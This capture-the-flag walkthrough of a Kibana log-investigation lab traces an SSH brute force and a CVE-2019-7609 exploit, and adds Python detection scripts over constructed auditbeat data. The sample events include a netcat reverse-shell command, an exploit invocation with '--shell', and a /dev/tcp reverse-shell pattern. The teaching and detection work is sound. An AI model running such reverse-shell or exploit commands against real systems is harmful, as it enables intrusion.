# GitTheGate Lab

Q1) Using the "View surrounding documents" option, find the ID of the document that is 14 documents before (older than) the document with the id GDQOB3IBwJHf9VOW-r0Y.

```kql
_id: GDQOB3IBwJHf9VOW-r0Y
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FqMz7dY9F5tVDCgptvU67%2FScreenshot(1).png?alt=media&#x26;token=cc327bf4-14f8-4c88-aa42-cebc20f80e39" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FeoQcy4pNWc3STg5kqTRi%2FScreenshot(2).png?alt=media&#x26;token=315d2720-3b73-4970-8569-73f28ac5b517" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FwNlIzitT1GsK8s20Et0o%2FScreenshot(3).png?alt=media&#x26;token=fe53b87b-50b4-4cbe-9b3e-45d15a0f6361" alt=""><figcaption></figcaption></figure>

Answer:  tzQOB3IBwJHf9VOW-Lyd

Q2) Using the "View surrounding documents" option, find the IP of the document that is 16 documents after (newer than) the document with the id vDQOB3IBwJHf9VOW-Lyd.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F1GFTUH20xr9fyQnPsfwa%2FScreenshot(4).png?alt=media&#x26;token=13859463-ddbf-448f-a8e8-f08f9ff8fba7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fo9jPN1naLYlXeOy11sUu%2FScreenshot(5).png?alt=media&#x26;token=080e695e-c65a-4ca7-8853-22440974337b" alt=""><figcaption></figcaption></figure>

Answer:  191.189.39.130

Q3) How many requests have come from the IP address 2.49.53.218 between the 6th of May and the 13th of May? (time is in UTC)

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FDUI5uYBiOkkldqpj0XTP%2FScreenshot(6).png?alt=media&#x26;token=c886c4cb-eefb-4429-8c38-aac74ded4c2d" alt=""><figcaption></figcaption></figure>

```kql
ip: 2.49.53.218
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FtlHmKJxM7ZpuVI2okAbx%2FScreenshot(7).png?alt=media&#x26;token=3ef53528-e9ca-4f47-8d94-09f8fe0b001f" alt=""><figcaption></figcaption></figure>

Answer:  7

Q4) What percentage of logs are from Windows 8 machines on the 11th of May? (time is in UTC)

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FCP8lFt4ZhhhBFVg3tTJc%2FScreenshot(8).png?alt=media&#x26;token=4663ad4c-5cd8-49bf-8f8b-59f3e7b859c8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FgRZB15pP5BamrIST68ie%2FScreenshot(9).png?alt=media&#x26;token=1e9f4635-713d-4dd5-8b51-ff33f7a9de8b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FAQEYWpMGdyNOJJMn48yz%2FScreenshot(10).png?alt=media&#x26;token=80ba4133-80b5-455a-a24a-5f43eb1f573c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F0AwGDwyjqWdEvundCWBt%2FScreenshot(11).png?alt=media&#x26;token=9cb51d9a-241a-403e-9cbc-f4acb480ea9c" alt=""><figcaption></figcaption></figure>

Answer:  21.74%

Q5) How many 503 errors were there on the 8th of May? (time is in UTC)

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FJ5CNzup0adwmFR9LaE47%2FScreenshot(12).png?alt=media&#x26;token=c2283719-c226-436b-b4cd-d800fc4e9a30" alt=""><figcaption></figcaption></figure>

```kql
response: 503
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FVVzGGRpRO6yFTv60Do16%2FScreenshot(13).png?alt=media&#x26;token=cc8fc715-0dec-43fc-add2-58e3b29570de" alt=""><figcaption></figcaption></figure>

Answer:  8

Q6) How many connections to the host www.elastic.co were made on the 12th of May? (time is in UTC)

```kql
host: www.elastic.co
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FbsCKPKzAGmQsvSSdXGRU%2FScreenshot(14).png?alt=media&#x26;token=51e50112-9f9f-4851-9bc5-6afada62d72e" alt=""><figcaption></figcaption></figure>

Answer:  82

Q7) What is the second most common extension of files being accessed on the 12th of May? (time is in UTC)

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FYf6oduFCu1utNWjfB5I1%2FScreenshot(15).png?alt=media&#x26;token=82fdde51-24b3-468a-9d38-c89ab6f27bb9" alt=""><figcaption></figcaption></figure>

Answer:  .gz

Q8) Find the first IP address to connect to the host elastic-elastic-elastic.org on the 12th of May. (time is in UTC)

```kql
host: "elastic-elastic-elastic.org"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F9nOY8YD35TQBXj2eZwPj%2FScreenshot(17).png?alt=media&#x26;token=0b885ac6-6674-4685-8a0b-f3f369ea548d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fl8F76xFXoew8DNVZ5QNX%2FScreenshot(18).png?alt=media&#x26;token=0b20a0a0-6646-406d-b1d1-507f1af68872" alt=""><figcaption></figcaption></figure>

Answer:  114.246.225.218

Q9) What was the username used that failed to log in on the 15th of May at 10:44 pm? (time is in UTC)

```kql
event.type: "authentication_failure"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F7AIzGNm7pJuJGQ4y0lG0%2FScreenshot(19).png?alt=media&#x26;token=1ef97461-cba4-4f68-af35-841066d6d348" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FpZ4LDzIK0gkXaXupJtQA%2FScreenshot(20).png?alt=media&#x26;token=71855a65-3ec2-40ae-a6b1-6182321e1b6f" alt=""><figcaption></figcaption></figure>

Answer:  deploy

Q10) According to the logs, which vulnerable version of Kibana was identified as running in the stack?

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fk8HOkeYf6sD0nv2BvSxZ%2FScreenshot(21).png?alt=media&#x26;token=dc165e61-fd8f-4dc4-b445-2f4850db1d07" alt=""><figcaption></figcaption></figure>

Answer:  7.6.2

Q11) Using current data in the auditbeat index, what is the name of the elasticsearch node? (one word)

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FjZ9CRBBoGYLR7GYEOs7w%2FScreenshot(22).png?alt=media&#x26;token=71008588-6cc1-40bb-991d-2272b72a68b0" alt=""><figcaption></figcaption></figure>

Answer:  elkstack

Q12) What is the name of the beat to collect windows logs? (one word)

Answer:  winlogbeat

Q13) What is the name of the beat that sends network data? (one word)

Answer: packetbeat

Q14) How many fields are in the auditbeat-\* index pattern?

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FCf6l3gUQ3GEhcx9bq7Gx%2FScreenshot(23).png?alt=media&#x26;token=4f59d5f5-0974-49dd-b484-ce784f93f1c8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F0O7OrJxbTlT7GCkq4dzU%2FScreenshot(24).png?alt=media&#x26;token=59645e10-21cc-4bd2-90bc-8d781f6f1f87" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FJkpgulFldCcrxHbc896e%2FScreenshot(25).png?alt=media&#x26;token=f813e75e-7b3e-44d4-baac-98a14c4abe07" alt=""><figcaption></figcaption></figure>

Answer:  437

Q15) On the 14th of May, how many failed authentication attempts did the host server receive? (time is in UTC)

```kql
event.type: authentication_failure
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FlFmptVCK83dVcfkJhJvW%2FScreenshot(26).png?alt=media&#x26;token=0e908707-04bb-4853-9faa-cd543ebbf6a3" alt=""><figcaption></figcaption></figure>

Answer:  762

Q16) On the 13th and 14th of May, how many bytes were received by the source IP 159.89.203.214? (time is in UTC)

```kql
source.ip: "159.89.203.214"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fv59YNuCbIK9pT45ad9E1%2FScreenshot(27).png?alt=media&#x26;token=cd581213-5afb-4daa-a804-87a056d45bde" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FI4dkORjU9doHlEPNobh7%2FScreenshot(28).png?alt=media&#x26;token=f5382e0c-68cc-425f-8e18-7befd5c5be94" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fhj7YWRWAVVzJazaCvghJ%2FScreenshot(29).png?alt=media&#x26;token=aadfddce-05d5-4a0a-b476-d64a87a3d3f9" alt=""><figcaption></figcaption></figure>

Answer:  492,919

Q17) What username did they crack?

```kql
event.type: "authentication_success"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FBkpQIZGCeHBS6cHHUtmI%2FScreenshot(30).png?alt=media&#x26;token=97ec9064-8d09-4816-a97c-3892f2936d4e" alt=""><figcaption></figcaption></figure>

```kql
event.type: "authentication_failure"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FoN77jaWqkGNIfcwnNRT6%2FScreenshot(31).png?alt=media&#x26;token=e28ef67f-4fe6-4580-9695-60f043bac385" alt=""><figcaption></figcaption></figure>

Answer:  johnny

Q18)  What host was attacked?

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F320x59XuxC93mvgPL8fD%2FScreenshot(33).png?alt=media&#x26;token=f32db481-3413-492f-b96a-9d0cd48e50b4" alt=""><figcaption></figcaption></figure>

Answer:  sshbox

Q19) How many failed attempts were made on the machine?

```kql
event.type: "authentication_failure"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fgw5BsJ2uBQbFODlHHbDE%2FScreenshot(34).png?alt=media&#x26;token=3c235969-f784-40f5-92f7-8413caf54b57" alt=""><figcaption></figcaption></figure>

Answer:  12523

Q20) What time was the last failed login attempt?

```kql
event.type: "authentication_failure" and host.name: "sshbox"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FaHUmIkpnvYXMqarWrXgt%2FScreenshot(35).png?alt=media&#x26;token=39827b3e-f5e3-4551-b718-e5135094c252" alt=""><figcaption></figcaption></figure>

Answer:  11:39:31

Q21) What time did the attacker successfully login?

Based on the scenario, the attack is believed to have occurred on May 25th between 9:00 AM and 11:30 AM.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fnq8ISrxqI22pGOYlGzYt%2FScreenshot(36).png?alt=media&#x26;token=adfa354a-8d69-4016-80d5-542b313701b0" alt=""><figcaption></figcaption></figure>

Answer:  11:50:13
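As an added example (not part of the original walkthrough and not the lab's data), the Discover filters behind Q9, Q15 and Q17 to Q21 written out as plain Python over a few constructed auditbeat-style login documents: failures on a UTC calendar day, failures inside a time window, the last failed attempt, and the account that was cracked, taken here as the first success from a source IP that had already failed at least `threshold` times on the same host. Field names follow ECS (`event.type`, `source.ip`, `user.name`, `host.name`); the hosts, users, IPs and timestamps are made up.

```python
"""Brute-force triage over auditbeat login events (added example, constructed data)."""
from collections import Counter
from datetime import datetime, timezone


def ev(ts, host, kind, src, user):
    """Build an ECS-shaped document like auditbeat's system/login dataset (constructed)."""
    return {"@timestamp": ts, "host": {"name": host}, "event": {"type": kind},
            "source": {"ip": src}, "user": {"name": user}}


# Constructed sample: 198.51.100.23 plays the attacker, 192.0.2.10 a normal admin login.
# The two johnny failures are deliberately out of order to show that parse() sorts by time.
SAMPLE_EVENTS = [
    ev("2020-05-24T22:10:00Z", "sshbox", "authentication_failure", "203.0.113.7", "deploy"),
    ev("2020-05-25T08:00:00Z", "sshbox", "authentication_success", "192.0.2.10", "ops"),
    ev("2020-05-25T09:00:00Z", "sshbox", "authentication_failure", "198.51.100.23", "admin"),
    ev("2020-05-25T09:00:01Z", "sshbox", "authentication_failure", "198.51.100.23", "root"),
    ev("2020-05-25T10:00:00Z", "webbox", "authentication_failure", "198.51.100.23", "admin"),
    ev("2020-05-25T11:39:31Z", "sshbox", "authentication_failure", "198.51.100.23", "johnny"),
    ev("2020-05-25T11:39:30Z", "sshbox", "authentication_failure", "198.51.100.23", "johnny"),
    ev("2020-05-25T11:50:13Z", "sshbox", "authentication_success", "198.51.100.23", "johnny"),
]


def field(doc, path):
    """Read a dotted ECS path ("source.ip") out of a nested document; None if absent."""
    for key in path.split("."):
        doc = doc.get(key) if isinstance(doc, dict) else None
    return doc


def utc(ts):
    """Parse an ISO-8601 'Z' timestamp into an aware UTC datetime."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc)


def parse(docs):
    """Flatten the fields we need and sort oldest first (Discover shows newest first)."""
    rows = [{"ts": utc(field(d, "@timestamp")), "host": field(d, "host.name"),
             "type": field(d, "event.type"), "src": field(d, "source.ip"),
             "user": field(d, "user.name")} for d in docs]
    return sorted(rows, key=lambda r: r["ts"])


def failures_on_day(rows, host, day):
    """Q15/Q19 style count: authentication_failure events on `host` during one UTC day (YYYY-MM-DD)."""
    return sum(1 for r in rows if r["host"] == host and r["type"] == "authentication_failure"
               and r["ts"].strftime("%Y-%m-%d") == day)


def failures_between(rows, start, end):
    """Q9 style lookup: (UTC time, user) for every failure in the half-open window [start, end)."""
    lo, hi = utc(start), utc(end)
    return [(r["ts"].strftime("%Y-%m-%dT%H:%M:%SZ"), r["user"])
            for r in rows if r["type"] == "authentication_failure" and lo <= r["ts"] < hi]


def last_failure(rows, host):
    """Q20: UTC wall-clock time of the most recent failed attempt on `host`, or None."""
    fails = [r for r in rows if r["host"] == host and r["type"] == "authentication_failure"]
    return fails[-1]["ts"].strftime("%H:%M:%S") if fails else None


def cracked_account(rows, host, threshold=3):
    """Q17/Q21: first success on `host` from a source IP that had already failed >= threshold times.

    Returns (user, 'HH:MM:SS', source ip). A success with no failures behind it from the same
    IP (the ops login above) is an ordinary login and is not reported.
    """
    failures_by_src = Counter()
    for r in rows:
        if r["host"] != host:
            continue
        if r["type"] == "authentication_failure":
            failures_by_src[r["src"]] += 1
        elif r["type"] == "authentication_success" and failures_by_src[r["src"]] >= threshold:
            return r["user"], r["ts"].strftime("%H:%M:%S"), r["src"]
    return None


if __name__ == "__main__":
    rows = parse(SAMPLE_EVENTS)
    print("failures on sshbox, 2020-05-25:", failures_on_day(rows, "sshbox", "2020-05-25"))
    print("last failure on sshbox:", last_failure(rows, "sshbox"))
    print("cracked:", cracked_account(rows, "sshbox"))
```

The explicit UTC handling is the part that bites in Kibana: Discover renders `@timestamp` in the browser's time zone unless `dateFormat:tz` in Advanced Settings is set to UTC, so a per-day count read off the time picker can differ from the one computed here by the local offset. The `threshold` on `cracked_account` is a tuning knob, not a rule; with the sshbox volumes in this lab (thousands of failures from one source) any small value works, but a threshold of 1 would also flag a user who simply mistyped a password once.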

Q22) What tool did the attacker use to get the exploit onto the machine?

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F03N1nW19hj72Sr7Tcpo4%2FScreenshot(38).png?alt=media&#x26;token=cff237d3-e660-4b71-b45a-daad6a0cc383" alt=""><figcaption></figcaption></figure>

Answer:  git

Q23) Shortly after getting the exploit on the machine, the attacker used vim to create a file. What is the name of that file?

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F4PVmH5fsnOyQ4plbMvPd%2FScreenshot(39).png?alt=media&#x26;token=824cb1ef-0ff5-4074-a03e-f9289463073a" alt=""><figcaption></figcaption></figure>

Answer:  ElasticCTFisFun!

Q24) What is the filename of the exploit that was run?

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F9EFjmqoal5vudGO3faNq%2FScreenshot(40).png?alt=media&#x26;token=6611859d-05b0-4317-8245-c612ef2200d9" alt=""><figcaption></figcaption></figure>

Answer:  CVE-2019-7609-kibana-rce.py

Note that CVE-2019-7609 is the Timelion arbitrary code execution bug and, as published, affects Kibana before 5.6.15 and 6.6.1; the lab presents 7.6.2 as the vulnerable version for its scenario, so do not carry that version over as real-world vulnerability data.

Q25) What is the first ID of the log that shows the exploit being run?

```kql
agent.hostname: "sshbox" and *CVE-2019-7609-kibana-rce.py*
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FlCBL5wEawY59tpyOcDos%2FScreenshot(41).png?alt=media&#x26;token=1f26a518-22f9-44bf-ad12-fc76bed56666" alt=""><figcaption></figcaption></figure>

Answer:  \_SHbS3IBCEolQs9lAD3z

Q26) What parameter turned the script from testing to exploiting?

From the PoC's README: <https://github.com/LandGrey/CVE-2019-7609>. Without the flag the script only checks whether the target is exploitable; with `--shell` it delivers the reverse-shell payload that connects back to the listener given on the command line.

Answer:  --shell

Q27) Determining the destination IP is key to tracing the attacker’s actions. What is the destination IP address where the malicious shell was sent?

```kql
agent.hostname: "sshbox" and process.name: "nc"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fn2uRGSqHNNiuG43BElb0%2FScreenshot(42).png?alt=media&#x26;token=3f3d5868-b65e-417d-bf67-3c7a2f348436" alt=""><figcaption></figcaption></figure>

Answer:  10.116.0.2

Q28) Identifying new users is vital to uncovering unauthorized access. What was the name of the user they created?

```kql
process.name: useradd
```


Answer:  Thanks4Playing
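As an added example (not part of the original walkthrough and not the lab's data), the post-exploitation questions Q23 to Q28 as detection logic over constructed auditbeat process-start documents: the exploit script's runs in time order with the test-versus-`--shell` distinction, the reverse-shell target pulled out of `nc` arguments, the file opened in an editor, and the account handed to `useradd`. The document shape (`_id` plus an ECS `process.name`/`process.args` source) follows what Discover shows; the command lines, IPs, ports and ids are made up, and the PoC flags are written the way the LandGrey README documents them.

```python
"""Post-exploitation triage over auditbeat process events (added example, constructed data)."""
import re
from datetime import datetime, timezone


def doc(doc_id, ts, name, args, host="sshbox"):
    """One Discover hit: the Elasticsearch _id plus an ECS-shaped process-start _source (constructed)."""
    return {"_id": doc_id, "_source": {"@timestamp": ts, "host": {"name": host},
                                       "process": {"name": name, "args": args}}}


# Constructed sample in the order Discover might return it (doc003 is listed after doc004 on
# purpose, so load() has to sort). IPs, ports and ids are made up.
SAMPLE_DOCS = [
    doc("doc001", "2020-05-25T11:51:02Z", "git",
        ["git", "clone", "https://github.com/LandGrey/CVE-2019-7609"]),
    doc("doc002", "2020-05-25T11:52:10Z", "vim", ["vim", "ElasticCTFisFun!"]),
    doc("doc004", "2020-05-25T11:54:20Z", "python3",
        ["python3", "CVE-2019-7609-kibana-rce.py", "-u", "http://127.0.0.1:5601",
         "-host", "10.116.0.2", "-port", "4444", "--shell"]),
    doc("doc003", "2020-05-25T11:53:00Z", "python3",
        ["python3", "CVE-2019-7609-kibana-rce.py", "-u", "http://127.0.0.1:5601"]),
    doc("doc005", "2020-05-25T11:54:21Z", "nc", ["nc", "-l", "-p", "4444"]),
    doc("doc006", "2020-05-25T11:54:25Z", "nc", ["nc", "-e", "/bin/sh", "10.116.0.2", "4444"]),
    doc("doc007", "2020-05-25T11:56:00Z", "useradd",
        ["useradd", "-m", "-s", "/bin/bash", "Thanks4Playing"]),
]

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def load(docs):
    """(_id, timestamp, process.name, process.args) tuples, oldest first."""
    rows = []
    for d in docs:
        src = d["_source"]
        ts = datetime.fromisoformat(src["@timestamp"].replace("Z", "+00:00")).astimezone(timezone.utc)
        rows.append((d["_id"], ts, src["process"]["name"], list(src["process"]["args"])))
    return sorted(rows, key=lambda r: r[1])


def exploit_runs(rows, script):
    """Q24-Q26: every execution of `script` as (doc id, ran with --shell), oldest first.
    The first tuple answers Q25; the flag separates a test run from an exploitation run."""
    return [(doc_id, "--shell" in args) for doc_id, _, _, args in rows
            if any(a.endswith(script) for a in args[1:])]


def reverse_shell_targets(rows):
    """Q27: outbound nc/ncat invocations with an explicit IPv4 target as (doc id, ip, port).

    Listeners (-l) are skipped, and the IP is located by shape rather than position, so both
    'nc host port' and 'nc -e /bin/sh host port' parse; port is the first number after the IP.
    """
    hits = []
    for doc_id, _, name, args in rows:
        if name not in ("nc", "ncat", "netcat") or "-l" in args:
            continue
        ip = next((a for a in args[1:] if IPV4.match(a)), None)
        if ip is None:
            continue
        after = args[args.index(ip) + 1:]
        port = next((int(a) for a in after if a.isdigit()), None)
        hits.append((doc_id, ip, port))
    return hits


def created_users(rows):
    """Q28: login names handed to useradd/adduser, assuming the conventional form in which the
    name is the last argument (options and their values, such as '-s /bin/bash', come first)."""
    return [args[-1] for _, _, name, args in rows
            if name in ("useradd", "adduser") and len(args) > 1 and not args[-1].startswith("-")]


def files_opened_in_editor(rows, editors=("vim", "vi", "nano")):
    """Q23: (doc id, path) for every non-option argument given to an editor."""
    return [(doc_id, a) for doc_id, _, name, args in rows if name in editors
            for a in args[1:] if not a.startswith("-")]


if __name__ == "__main__":
    rows = load(SAMPLE_DOCS)
    print("exploit runs:", exploit_runs(rows, "CVE-2019-7609-kibana-rce.py"))
    print("reverse shells:", reverse_shell_targets(rows))
    print("editor files:", files_opened_in_editor(rows))
    print("new users:", created_users(rows))
```

Two design points carry over to real data. First, "first ID of the log" (Q25) only means something after sorting on `@timestamp`; Discover's default sort is newest first, so the top hit there is the last run, not the first. Second, the `nc` parser keys on argument shape, not on `-e`: in the wild the same connection is often made with `bash -i >& /dev/tcp/...` or `ncat --exec`, which this function would miss, so in a real hunt pair the process view with the `destination.ip` of the matching network flow rather than relying on command-line parsing alone.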
